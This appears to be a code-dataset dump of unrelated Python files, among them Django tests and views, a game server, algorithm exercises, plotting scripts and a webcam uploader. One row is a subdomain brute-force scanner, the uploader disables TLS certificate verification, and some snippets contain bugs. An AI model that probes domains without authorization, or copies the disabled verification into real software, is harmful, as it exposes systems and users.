self.u1.profile.bio = "I'm a female profile with inserted components"
self.u1.profile.birth_date = datetime.now()
self.u1.profile.gender = 'female'
self.u1.profile.save()
def test_components_profile(self):
"""Test the inserted components profile"""
profile = Profile.objects.get(bio="I'm a female profile with inserted components")
self.assertEqual(self.u1.profile, profile)
def test_components_profile_gender(self):
"""Test the inserted components profile's gender"""
self.assertEqual(self.u1.profile.gender, 'female')
class SignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
self.response = self.client.get(url)
def test_signup_status_code(self):
"""Test if /signup/ returns status 200"""
self.assertEquals(self.response.status_code, 200)
def test_signup_url_resolves_signup_view(self):
"""Test if /signup/ returns the signup view"""
view = resolve('/signup/')
self.assertEquals(view.func, signup)
def test_form_inputs(self):
"""Test if the view contains five inputs: csrf, username, email, pass1 and 2"""
self.assertContains(self.response, '<input', 5)
self.assertContains(self.response, 'type="text"', 1)
self.assertContains(self.response, 'type="email"', 1)
self.assertContains(self.response, 'type="password"', 2)
class SignUpFormTests(TestCase):
def test_form_has_fields(self):
"""Test if SignUpForm still has the proper fields"""
form = SignUpForm()
expected = ['username', 'email', 'password1', 'password2']
actual = list(form.fields)
self.assertSequenceEqual(expected, actual)
class SuccessfulSignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
data = {
'username': 'Gab',
'email': 'gab@gmail.com',
'password1': 'test',
'password2': 'test',
}
self.response = self.client.post(url, data)
self.home_url = reverse('index')
|
22,035 | bbcd8f12f3292b995c03c5efc26c36f515e75f55 | import time
import requests
def main():
city_lat = 44.89
city_lon = 37.31
app_id = 'your app_id'
time_delta = int(time.time()) + 432000
morn = 0
max_temp =list()
try:
res = requests.get("https://api.openweathermap.org/data/2.5/onecall",
params={'lat': city_lat, 'lon': city_lon, 'units': 'metric',
'lang': 'ru', 'exclude': 'minutely,hourly,alerts',
'APPID': app_id})
data = res.json()
for i in data['daily']:
if time_delta >= i['dt']:
morn += i['temp']['morn']
max_temp.append(i['temp']['max'])
print(f'average_morn: {morn/5}')
print(f'average_max: {max(max_temp)}')
except Exception as e:
print("Exception (forecast):", e)
|
22,036 | d440a882f87f12ab6036fefb19e0184cbc9fcd42 | import asyncio
import json
import enum
import functools
from protocol import Header, Error
from . import request_schemas, response_schemas
from .creature import Creature
from .player import Player
from engine import Engine, API
from marshmallow import ValidationError
# debug
from marshmallow import pprint
class Game(object):
ENGINE_ITERATE_INTERVAL = 1
sessions = dict()
engine = None
api = None
engine_is_working = False
def __init__(self):
self.engine = Engine()
self.api = API(self.engine)
async def run(self):
"""Coroutine that iterates engine. It is obvious to run it
if you want to run applicaion.
"""
self.engine_is_working = True
while self.engine_is_working:
self.engine.iterate_world()
await asyncio.sleep(Game.ENGINE_ITERATE_INTERVAL)
def check_request(request_schema):
""" Checks if given request is valid. An can be
serialized using given schema.
Decorator has to be used only with request-handler functions.
Validates request, at worst returns error header and messages, otherwise
pass validated request to decorated function.
"""
def decorator(f):
@functools.wraps(f)
def wrapper(self, addr, request):
data, err = request_schema.load(request)
if err:
return Header.ERROR, Error.WRONG_REQUEST
else:
return f(self, addr, data)
return wrapper
return decorator
def check_authorized(f):
"""Decorator that checks if user authorized.
Decorator has to be used only with request-handler functions.
Actually checks if `authorized` key exists and its value equals `True`.
At worst return corresponding error.
"""
@functools.wraps(f)
def wrapper(self, addr, request):
if not self.sessions[addr].get("authorized"):
return Header.ERROR, Error.FORBIDDEN_REQUEST
else:
return f(self, addr, request)
return wrapper
@check_request(request_schemas.AuthRequestSchema())
def auth_handler(self, addr, request):
self.sessions[addr]["uid"] = request["uid"]
self.sessions[addr]["authorized"] = True
self.sessions[addr]["last_commit"] = 0
return Header.RESPONSE, "Authorized!"
@check_request(request_schemas.EchoRequestSchema())
@check_authorized
def echo_handler(self, addr, request):
echo = f"<{self.sessions[addr]['uid']}>: {request['data']}>"
return Header.RESPONSE, echo
@check_authorized
def init_player_handler(self, addr, request):
player = Player(addr)
self.api.add_player(addr, player)
return Header.RESPONSE, "Player created."
@check_request(request_schemas.MoveRequestSchema())
@check_authorized
def move_handler(self, addr, request):
player_id = self.api.get_player_id(addr)
self.api.move_object(player_id, request["x"], request["y"])
return Header.RESPONSE, "Moved."
@check_authorized
def get_world_handler(self, addr, request):
world = self.api.get_world_dump()
response = dict(world=world)
response, err = response_schemas.GetWorldSchema().dump(response)
self.sessions[addr]["last_commit"] = self.api.get_last_commit_id()
return Header.RESPONSE, json.dumps(response)
@check_authorized
def update_handler(self, addr, request):
""" Attention, big kostyl! Fix it """
commits = self.api.get_commits(start_from=self.sessions[addr]["last_commit"])
from engine.commit_container.commit import Commit
t, e = Commit.Schema(many=True).dump(commits["commits"])
response = {
"type" : "update",
"commit_range" : {
"commits" : t
}
}
self.sessions[addr]["last_commit"] = self.api.get_last_commit_id()
return Header.RESPONSE, json.dumps(response)
request_handlers = {
"auth" : auth_handler,
"echo" : echo_handler,
"init_player" : init_player_handler,
"get_world" : get_world_handler,
"update" : update_handler,
"move" : move_handler
}
def connection_handler(self, addr):
print(f"<{addr}> Connected to the server")
self.sessions[addr] = {}
def disconnection_handler(self, addr):
print(f"<{addr}> Disconnected from the server")
del self.sessions[addr]
def process_exnternal_request(self, addr, data_type, data_size=0, data=bytes()):
"""Handles external request and returns result.
:param addr: Unique network address of client (socket-address)
:param data_type: Header with which request was sent
:return: Returns protocol header and data of the response
"""
if data_type == Header.REQUEST:
try:
request = json.loads(data)
except json.decoder.JSONDecodeError:
return Header.ERROR, Error.SERIALIZE_ERROR
data, err = request_schemas.BaseRequestSchema().load(request)
if err or not data["request"] in self.request_handlers:
return Header.ERROR, Error.WRONG_REQUEST
handler = self.request_handlers[data["request"]]
return handler(self, addr, request)
else:
return Header.ERROR, Error.WRONG_REQUEST
|
22,037 | 1961e7b9e35080c191559e8971e6ec29212086c1 | import numpy as np
arr = np.array([int(n) for n in input().split()])
reshapedarr = np.reshape(arr, (3,3))
print(reshapedarr)
|
22,038 | a5d5f37b29c7df7b69535ff4398a06f63285adf4 | import requests
import sys
from optparse import OptionParser
def scanDomains(domain, port):
sub_list = open("Wordlists/subdomains-10000.txt").read()
subs = sub_list.splitlines()
for word in subs:
url = f"http://{word}.{domain}:{port}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("[+] Discovered subdomain:: ",url)
if __name__ == '__main__':
# Set up options from the commandline
usage = "usage: %prog [options] filename"
parser = OptionParser(usage=usage)
parser.add_option("-p", "--port", dest="port",help="set target port to PORT", metavar="PORT", default="80")
parser.add_option("-s", "--secure", dest="secure",help="Forces request to use SSL", default=False, action="store_true")
parser.add_option(("-a"), "--https", dest="https",help="Scans using https", default=False )
parser.add_option("-t", "--target", dest="target",help="set target domain in format domain.top_level_domain", metavar="HOST")
(options, args) = parser.parse_args()
scanDomains(options.target, options.port)
|
22,039 | 50ecab58869447d94d44b1c053248d88265a7ade | from pyDatalog import pyDatalog
pyDatalog.create_terms('X, Y, Z, H, doctor, spec, simpt, patient, depart, dep_simpt, pat_doc, pat_dep')
pyDatalog.create_terms('K, L, nurse, helps_the_doctor)
+(doctor['Dr. Alex'] == 'Lor')
+(doctor['Dr. Mary'] == 'Oculist')
+(doctor['Dr. Mitch'] == 'Therapist')
+(doctor['Dr. Marty'] == 'Orthopedist')
+(doctor['Dr. Kenny'] == 'Cardiologist')
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['John']=='Dr. Mary')
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['Mary']=='Dr. Alex')
+(spec['Nose'] == 'Lor')
+(spec['Ears'] == 'Lor')
+(spec['Throat'] =='Lor')
+(spec['Eye'] == 'Oculist')
+(spec['Stomach'] == 'Therapist')
+(spec['Liver'] == 'Therapist')
+(spec['Foot'] == 'Orthopedist')
+(spec['Back'] == 'Orthopedist')
+(spec['Heart'] == 'Cardiologist')
+(depart['Dr. Alex'] == '1')
+(depart['Dr. Mary'] == '1')
+(depart['Dr. Mitch'] == '2')
+(depart['Dr. Marty'] =='2')
+(depart['Dr. Kenny'] == '3')
(simpt[X] == Y) <= (spec[X] == Z) & (doctor[Y] == Z)
#print(simpt[X] == Y)
(dep_simpt[X] == Y) <= (simpt[X] == Z) & (depart[Z] == Y)
#print(dep_simpt[X] == Y)
+(patient['Dalas'] == 'Nose')
+(patient['Erik'] == 'Foot')
+(patient['Bill'] == 'Back')
+(patient['Ana'] == 'Heart')
+(patient['Sony'] == 'Eye')
+(patient['Saly'] == 'Ears')
(pat_doc[X] == Y) <= (patient[X] == Z) & (simpt[Z] == Y)
print('Вывод врача для пациента:\n')
print(pat_doc[X] == Y)
(pat_dep[X] == Y) <= (patient[X] == Z) & (dep_simpt[Z] == Y)
print('\nВывод номера отделения для пациента:\n')
print(pat_dep[X] == Y)
|
22,040 | a2077869a3403629a86d0bd29d8f1cb3bccfdfc8 | import collections
class Solution:
def commonChars(self, A: [str]) -> [str]:
if not A:
return []
# first word
cur_dict = self.get_char_count(A[0])
# the rest words
for i in range(1, len(A)):
new_dict = self.get_char_count(A[i])
for c in cur_dict:
if c in new_dict:
cur_dict[c] = min(cur_dict[c], new_dict[c])
else:
cur_dict[c] = 0
res = []
for c in cur_dict:
for i in range(cur_dict[c]):
res.append(c)
return res
def get_char_count(self, word: str):
count = collections.defaultdict(int)
for c in word:
count[c] += 1
return count
# use counter, same logic
def commonChars_1(self, A: [str]) -> [str]:
if not A:
return []
# first word
cur_dict = collections.Counter(c for c in A[0])
# the rest words
for i in range(1, len(A)):
new_dict = collections.Counter(c for c in A[i])
for c in cur_dict:
if c in new_dict:
cur_dict[c] = min(cur_dict[c], new_dict[c])
else:
cur_dict[c] = 0
res = []
for c in cur_dict:
for i in range(cur_dict[c]):
res.append(c)
return res
sol = Solution()
A = ["bella","label","roller"]
A = ["cool","lock","cook"]
print(sol.commonChars_1(A))
|
22,041 | ce22423892a403b8e724b95e00716595c8bac9a4 | from tkinter import *
import time
def button_clicked():
# изменяем текст кнопки
button['text'] = time.strftime('%H:%M:%S')
root=Tk()
# создаём виджет
button = Button(root)
# конфигурируем виджет после создания
button.configure(text=time.strftime('%H:%M:%S'), command=button_clicked)
# также можно использовать квадратные скобки:
# button['text'] = time.strftime('%H:%M:%S')
# button['command'] = button_clicked
button.pack()
root.mainloop()
|
22,042 | 35b859d37d2c7071677338767571b5bd716e31cc | # -*- coding: utf-8 -*-
# original: https://raw.githubusercontent.com/UedaTakeyuki/slider/master/mh_z19.py
#
# © Takeyuki UEDA 2015 -
import os
import subprocess
import ConfigParser
import datetime
import requests
import urllib3
import shutil
from error_counter import Counter
from urllib3.exceptions import InsecureRequestWarning
# refer http://73spica.tech/blog/requests-insecurerequestwarning-disable/
urllib3.disable_warnings(InsecureRequestWarning)
# Const
configfile = os.path.dirname(os.path.abspath(__file__))+'/uvc_photo.ini'
# setting
settings = {
"folder": "/tmp/",
"device": "/dev/video0",
"delay": "1",
"skip": "20",
"width": "320",
"hight": "240",
"er_on": False,
"read_error_counter": "",
"send_error_counter": ""
}
# https://code.i-harness.com/en/q/aea99
def str2bool(v):
return v.lower() in ("yes", "true", "t", "1")
# termination type
TERMINATOR_DELETEVALUE_AS_FILE=True
def setconfig(ini):
global settings
if "photo" in ini.sections():
if "folder" in dict(ini.items("photo")).keys() and ini.get("photo","folder"):
settings["folder"] = ini.get("photo","folder")
if settings["folder"][-1:] != "/":
settings["folder"] += "/"
if not os.path.exists(settings["folder"]):
os.makedirs(settings["folder"]) # keyword "exist_ok" is for 3
if "device" in dict(ini.items("photo")).keys() and ini.get("photo","device"):
settings["device"] = ini.get("photo","device")
if "delay" in dict(ini.items("photo")).keys() and ini.get("photo","delay"):
settings["delay"] = ini.get("photo","delay")
if "skip" in dict(ini.items("photo")).keys() and ini.get("photo","skip"):
settings["skip"] = ini.get("photo","skip")
if "width" in dict(ini.items("photo")).keys() and ini.get("photo","width"):
settings["width"] = ini.get("photo","width")
if "hight" in dict(ini.items("photo")).keys() and ini.get("photo","hight"):
settings["hight"] = ini.get("photo","hight")
if "error_recovery" in ini.sections():
if "recover_on" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","recover_on"):
settings["er_on"] = str2bool(ini.get("error_recovery", "recover_on")) # error_recovery
# error_counter
if settings["er_on"]:
if "readcounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","readcounterfile"):
settings["read_error_counter"] = Counter(ini.get("error_recovery", "readcounterfile"))
if "readcounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","sendcounterfile"):
settings["send_error_counter"] = Counter(ini.get("error_recovery", "sendcounterfile"))
if "savecounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","savecounterfile"):
settings["save_error_counter"] = Counter(ini.get("error_recovery", "savecounterfile"))
if os.path.exists(configfile):
ini = ConfigParser.SafeConfigParser()
ini.read(configfile)
setconfig(ini)
def take_photo():
global settings
now = datetime.datetime.now()
filepath = "{}{}.jpg".format(settings["folder"],now.strftime("%Y%m%d%H%M%S"))
if os.path.exists(filepath): # remove if old version exist
os.remove(filepath)
command_str = "fswebcam --no-timestamp --title \"©Atelier UEDA\" {} -d {} -D {} -S {} -r {}x{}".format(filepath,
settings["device"],
settings["delay"],
settings["skip"],
settings["width"],
settings["hight"])
p = subprocess.Popen(command_str, stderr = subprocess.PIPE, shell=True)
p.wait() # wait for finish.
if not os.path.exists(filepath): # Camera IO erro
# raise IOError(''.join(p.stderr.readlines()))
if settings["er_on"]:
settings["read_error_counter"].inc_error()
else:
if settings["er_on"]:
settings["read_error_counter"].reset_error()
return filepath
def read():
return {"photo": take_photo()}
def is_photo_source(sensor_handlers):
return 'TERMINATOR_DELETEVALUE_AS_FILE' in dir(sensor_handlers)
def handle(sensor_handlers, data_name, value):
print ("start handle")
if is_photo_source(sensor_handlers):
files = {'upfile': open(value, 'rb')}
payload = {'viewid': ini.get("server", "view_id")}
r = None
try:
r = requests.post(ini.get("server", "url"), data=payload, files=files, timeout=10, verify=False)
except:
if settings["er_on"]:
settings["send_error_counter"].inc_error()
if not r is None:
if settings["er_on"]:
settings["send_error_counter"].reset_error()
print r.text
save(ini.get("server", "view_id"), value)
print ("end handle")
def save(viewid, picfilepath):
try:
# make saving folder
base_of_saving_folder = ini.get("save", "data_path")
saving_folder = base_of_saving_folder + "/" + viewid
if not os.path.exists(saving_folder):
os.makedirs(saving_folder)
shutil.copyfile(picfilepath, saving_folder + "/" + os.path.basename(picfilepath))
except:
if settings["er_on"]:
settings["save_error_counter"].inc_error()
if settings["er_on"]:
settings["save_error_counter"].reset_error()
def terminate(sensor_handlers, data_name, value):
print ("start terminate")
if is_photo_source(sensor_handlers):
os.remove(value)
print ("end terminate")
if __name__ == '__main__':
value = read()
print (value)
|
22,043 | 3c3ec6f98c032d8097a47a57536c6a7bc58d8ac6 | '''
Created on 26. sep. 2012
@author: Habitats
'''
from heapq import heappop, heappush
from fileinput import input
#import time
def prim(graph):
minimalSpanTree, heapQueue = {} , [(0, None, 0)] # weight - lastNode - startNode
maxWeight = 0
while heapQueue:
nodeWeight, lastNode, newNode = heappop(heapQueue)
if newNode in minimalSpanTree:
continue
minimalSpanTree[newNode] = lastNode
if nodeWeight > maxWeight:
maxWeight = nodeWeight
for node, weight in graph[newNode].items():
# print "from:", node , "to:" , newNode, "weight:" , weight
heappush(heapQueue, (weight, newNode, node))
return maxWeight
def genInput():
graph = []
node = 0
for line in input():
args = line.split()
node = {}
for arg in args:
to, weight = arg.split(":")
to = int(to)
weight = int(weight)
node[to] = weight
graph.append(node)
return graph
#start = time.clock()
#graph = genInput()
#print (time.clock() - start) * 1000
#
#start = time.clock()
#print prim(graph, 0)
#print (time.clock() - start) * 1000
#start = time.clock()
print prim(genInput())
#print time.clock()-start
|
22,044 | 88875255da267f609d19eb9b7e03c4dcb559978f | #!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
url_lu = "/home/jgines/waf2020_data/data/exp2/lu/"
url_proposal = "/home/jgines/waf2020_data/data/exp2/proposal/"
n = len(os.listdir(url_lu)) + 1
numberofcsvs = range(1,n)
extension = ".csv"
#df = pd.DataFrame(columns=["distance","robot_cost"])
#for i in numberofcsvs:
# url_num = url + str(i) + extension
# df_ = pd.read_csv(url_num, keep_default_na = False)
# df = pd.concat([df, df_])
#df_cost = pd.DataFrame()
#for i in numberofcsvs:
# url_num = url + str(i) + extension
# df_ = pd.read_csv(url_num, keep_default_na = False)
# df_cost = pd.concat([df_cost, df_["robot_cost"]], axis=1)
df_dist_lu = pd.DataFrame()
for i in numberofcsvs:
url_num = url_lu + str(i) + extension
df_ = pd.read_csv(url_num, keep_default_na = False)
df_dist_lu = pd.concat([df_dist_lu, df_["distance"]], axis=1)
df_dist_proposal = pd.DataFrame()
for i in numberofcsvs:
url_num = url_proposal + str(i) + extension
df_ = pd.read_csv(url_num, keep_default_na = False)
df_dist_proposal = pd.concat([df_dist_proposal, df_["distance"]], axis=1)
df_dist_lu.head(100)
df_dist_proposal.head(100)
#df_cost.head(100)
#mean_cost = df_cost.mean(axis=1)
mean_distance_lu = df_dist_lu.mean(axis=1)
mean_distance_proposal = df_dist_proposal.mean(axis=1)
plt.plot(mean_distance_lu.values) # mean distance between robot and human
plt.plot(mean_distance_proposal.values)
plt.xlabel('Time (s)')
plt.ylabel('Distance (m)')
plt.yticks(np.arange(min(mean_distance_proposal.values),
max(mean_distance_lu.values) + 0.2, 0.2))
#plt.title('Distance to human during the Escort task.')
plt.savefig("/home/jgines/waf2020_data/figures/distance.pdf")
plt.clf()
print("Experiments: " + str(len(df_['distance'])))
#plt.plot(mean_cost.values)
#plt.xlabel('Time (s)')
#plt.ylabel('Distance (miles)')
#plt.title('Distance traveled')
#plt.savefig("/home/jgines/waf2020_data/figures/cost.pdf")
#plt.clf()
#print ("-------------- Extracted data ------------")
#print("Experiments: " + str(len(df['time'])))
#print("Time (tau): " + str(df['time'].mean()) + "(" + str(df['time'].std()) + ")")
#print("Distance (dt): " + str(df['distance'].mean()) + "(" + str(df['distance'].std()) + ")")
#print("dmin: " + str(df['dmin'].min()))
#print("dmin: " + str(df['dmin'].mean()) + "(" + str(df['dmin'].std()) + ")")
#print("psi_personal: " + str(df['psi_personal'].mean()) + "(" + str(df['psi_personal'].std()) + ")")
#print("psi_intimate: " + str(df['psi_intimate'].mean()) + "(" + str(df['psi_intimate'].std()) + ")") |
22,045 | c219d296ef8fb37ad46d6112ca66c0ae831ccde6 | import random
from django.conf import settings
from django.http import HttpResponse, Http404, JsonResponse
from django.shortcuts import render, redirect
from django.utils.http import is_safe_url
from .forms import PostFrom
from .models import Post
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
# Create your views here.
def home_page(request, *args, **kwargs):
return render(request, "pages/main.html", context={}, status=200)
def post_create_view(request, *arg, **kwargs):
form = PostFrom(request.POST or None)
next_url = request.POST.get("next") or None
if form.is_valid():
obj = form.save(commit=False)
obj.save()
# Saving to DF
if request.is_ajax():
return JsonResponse({}, status=201) # 201 for created items || wanna replace {} with serialize from models.py, but got error 500
if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):
return redirect(next_url)
form = PostFrom()
return render(request, 'components/form.html', context={"form": form})
def post_list_view(request, *args, **kwargs):
"""
REST API View
Consumed by JavaScript
return json data
"""
qs = Post.objects.all()
posts_list = [{"id": x.id, "content": x.content, "likes": random.randint(0, 120), "reposts": random.randint(0, 10)} for x in qs] #{"id": x.id, "content": x.content, "likes": random.randint(0, 120), "reposts": random.randint(0, 10) }/x.serialize()
data = {
"isUser": False,
"response": posts_list
}
return JsonResponse(data) #, save=False
def post_detail_id(request, post_id, *args, **kwargs):
"""
REST API View
Consumed by JavaScript
return json data
"""
data = {
"id": post_id,
}
status = 200
try:
obj = Post.objects.get(id=post_id)
data['content'] = obj.content
except:
data['message'] = "not found"
status = 404
return JsonResponse(data, status=status) #json.dumps content_type='application/json'
# looking ro mentor in JS & Python cause sometimes i need fresh look for code! |
22,046 | fc60a8fe4f305510eaf83fffb0b9361f3e2eb8d2 | # Generated by Django 3.0.3 on 2020-05-25 08:44
import ToDo.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ToDo', '0021_auto_20200525_0019'),
]
operations = [
migrations.AlterField(
model_name='attachments',
name='content',
field=models.FileField(default=None, help_text='Add important documents or pictures', upload_to=ToDo.models.get_attachment_dir),
preserve_default=False,
),
]
|
22,047 | 568c63a5d8e025f71e4681c1354338c88564ee18 | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 4 10:50:08 2021
@author: hp
"""
from flask_restful import Resource, request
from Models.User import UserModel
class UserResource(Resource):
'''
def get(self, email):
#print("args:",request.args.get)
#email = request.args.get('email')
print("email:",email)
return UserModel.get_by_email(email)
'''
def get(self):
return {"users": [x.json() for x in UserModel.get_list()]}
def post(self):
print(request.get_json())
request_data = request.get_json()
user = UserModel(None,
request_data['nameu'],
request_data['email'],
request_data['pwd'],
request_data['admin'])
#print(user.json())
if(user.save_to_db()):
return "User successfully added"
|
22,048 | bdc013deb5a2256fb2e47465b08a77ec4371a50c | """Handles all API requests.""" |
22,049 | d51c7604ab5e0f79e81073a1685461b48528019d | from enum import Enum
import abc
from .Ingredient import *
class PizzaType(Enum):
CHEESE_PIZZA = 0
class Pizza(metaclass=abc.ABCMeta):
def __init__(self, ingredients:list[Ingredient]) -> None:
self.ingredients = ingredients
@abc.abstractmethod
def getName(self) -> str:
return NotImplemented
@abc.abstractmethod
def showIngredients(self) -> str:
return NotImplemented
class CheesePizza(Pizza):
def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
super().__init__(ingredients)
self.cheese = cheese
class CheesePizzeOfStoreA(CheesePizza):
def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
super().__init__(cheese, ingredients)
def getName(self) -> str:
return "store A cheese pizze"
def showIngredients(self) -> str:
ingredientsStr = self.cheese.getInfo()
for ingredient in self.ingredients:
ingredientsStr += (", " + ingredient.getInfo())
return ingredientsStr
class CheesePizzeOfStoreB(CheesePizza):
def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
super().__init__(cheese, ingredients)
def getName(self) -> str:
return "store B cheese pizze"
def showIngredients(self) -> str:
ingredientsStr = self.cheese.getInfo()
for ingredient in self.ingredients:
ingredientsStr += (", " + ingredient.getInfo())
return ingredientsStr
|
22,050 | 47bfca0c8044b0367adb966bdb898518b917112e | # -*- coding: UTF-8 -*-
#从sklearn.datasets里导入手写体数字加载器
from sklearn.datasets import load_digits
#从通过数据加载器活得手写体数字的数码图像数据并存储在digits变量中
digits = load_digits()
print digits.data.shape
# 使用sklearn.model_selection里的train_test_split模块切分数据集,得到训练集和测试集
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(digits.data, digits.target, test_size=0.25, random_state=33)
print y_train
# 从sklearn.preprocessing里导入数据标准化模块
from sklearn.preprocessing import StandardScaler
# 从sklearn.svm里导入基于现行假设的支持向量机分类器LinearSVC
from sklearn.svm import LinearSVC
# 对训练集和测试集进行标准化
ss=StandardScaler()
X_train = ss.fit_transform(X_train)
X_test = ss.transform(X_test)
#初始化线性假设的支持向量机分类器LinearSVC
lsvc = LinearSVC()
lsvc.fit(X_train,y_train)
#利用训练好的模型对测试数据集进行预测
y_predict = lsvc.predict(X_test)
#############################性能评估#################################3
#使用模型自带的评估函数进行准确性测评
print 'Accutacy of LinearSVC is:', lsvc.score(X_test,y_test)
# 使用sklearn.metric里面的classification_report模块对预测结果作更加详细的分析
from sklearn.metrics import classification_report
print classification_report(y_test,y_predict,target_names=digits.target_names.astype(str))
|
22,051 | 090416bc983ada5e590564f11aeaaeb64ca6ac5c | def ones(s):
b = bin(s)
b = b[2:]
c=0
n = len(b)
for i in range(n):
if b[i]=="1":
c+=1
return c
t = int(input())
for k in range(t):
a = input()
n = len(a)
c = 0
for j in range(0,n,1):
b = a[:j+1]
if c<=ones(int(b)):
c = ones(int(b))
print(c)
|
22,052 | d8b5650b0ac652508b0217578d2b320ef3693699 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import os
plt.style.use('y1a1')
matplotlib.rcParams['text.usetex']=False
import treecorr
colnames = {'shear' : ('shear_1', 'shear_2'), 'ellipticity' : ('ellipticity_1', 'ellipticity_2'), 'ellipticity_true' : ('ellipticity_1_true', 'ellipticity_2_true')}
class corrfns:
def compute_shear_shear(self, i, j, cat1, cat2):
maski = (cat1.mask) & (self.p1==i)
maskj = (cat2.mask) & (self.p2==j)
# Initialised the catlogues
namei_1,namei_2 = colnames[self.corrtype[0]]
cat_i = treecorr.Catalog(g1=cat1.cols[namei_1][maski], g2=cat1.cols[namei_2][maski], ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
namej_1,namej_2 = colnames[self.corrtype[1]]
cat_j = treecorr.Catalog(g1=cat2.cols[namej_1][maskj], g2=cat2.cols[namej_2][maskj], ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
# Set up the correlation
# Note that we're using the binning configuration from
# the first of the two config files
# might be good to check and give a warning if the two files
# specify different 2pt binning parameters
gg = treecorr.GGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
# And process it
gg.process(cat_i,cat_j)
theta = np.exp(gg.meanlogr)
xip = gg.xip
xim = gg.xim
xiperr = ximerr = np.sqrt(gg.varxi)
return theta, xip, xim, xiperr, ximerr
def compute_position_shear(self, i, j, cat1, cat2):
maski = (cat1.mask) & (self.p1==i)
maskj = (cat2.mask) & (self.p2==j)
# Initialised the catlogues
cat_i = treecorr.Catalog(ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
rcat_i = treecorr.Catalog(ra=self.rcat1['ra'][maski], dec=self.rcat1['dec'][maski], ra_units='deg', dec_units='deg')
namej_1,namej_2 = colnames[self.corrtype[1]]
cat_j = treecorr.Catalog(g1=cat2.cols[namej_1][maskj], g2=cat2.cols[namej_2][maskj], ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
# Set up the correlation
ng = treecorr.NGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
rg = treecorr.NGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
# And process it
ng.process(cat_i,cat_j)
rg.process(rcat_i,cat_j)
gammat, gammat_im, gammaterr = ng.calculateXi(rg)
theta = np.exp(ng.meanlogr)
gammaterr = np.sqrt(gammaterr)
return theta, gammat, gammat_im, gammaterr, gammaterr
def compute_position_position(self, i, j, cat1, cat2):
maski = (cat1.mask) & (self.p1==i)
maskj = (cat2.mask) & (self.p2==j)
rmaski = np.random.choice(self.rcat1['ra'].size, size=maski[maski].size, replace=False)
rmaskj = np.random.choice(self.rcat2['ra'].size, size=maskj[maskj].size, replace=False)
# Initialised the catlogues
cat_i = treecorr.Catalog(ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
cat_j = treecorr.Catalog(ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
rancat_i = treecorr.Catalog(ra=self.rcat1['ra'][rmaski], dec=self.rcat1['dec'][rmaski], ra_units='deg', dec_units='deg')
rancat_j = treecorr.Catalog(ra=self.rcat2['ra'][rmaskj], dec=self.rcat2['dec'][rmaskj], ra_units='deg', dec_units='deg')
# Trigger a warning if the random catalogues differ significantly from
# the main catalogues in size
checki = (abs(cat_i.x.size - rancat_i.x.size) * 1./cat_i.x.size)>0.25
checkj = (abs(cat_j.x.size - rancat_j.x.size) * 1./cat_j.x.size)>0.25
if checki or checkj:
print("Warning: there are either significantly more or fewer randoms than actual galaxies in one or both samples.")
# Set up the correlation
nn = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
# And process it
nn.process(cat_i,cat_j)
nr = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
rn = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
rr = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
nr.process(cat_i,rancat_j)
rn.process(rancat_i,cat_j)
rr.process(rancat_i,rancat_j)
wtheta,wthetaerr = nn.calculateXi(rr,dr=nr,rd=rn)
theta = np.exp(nn.meanlogr)
wthetaerr = np.sqrt(wthetaerr)
return theta, wtheta, np.array([0]*len(theta)), wthetaerr, np.array([0]*len(theta))
|
22,053 | f376bb8bfd04971edebf054cd16303336786e24e | n = int(input())
A = [int(x) for x in input().split(" ")]
m = int(input())
B = [int(x) for x in input().split(" ")]
#Returns a dict using as keys the value of each of the arrays and as value the number of times that it repeats on that array
def to_dict(arr):
out = {}
for a in arr:
if not a in out:
out[a] = 0
out[a] += 1
return out
def look_for_differences(dict_a, dict_b):
# We don't check if the array key exists because is given as a constraint
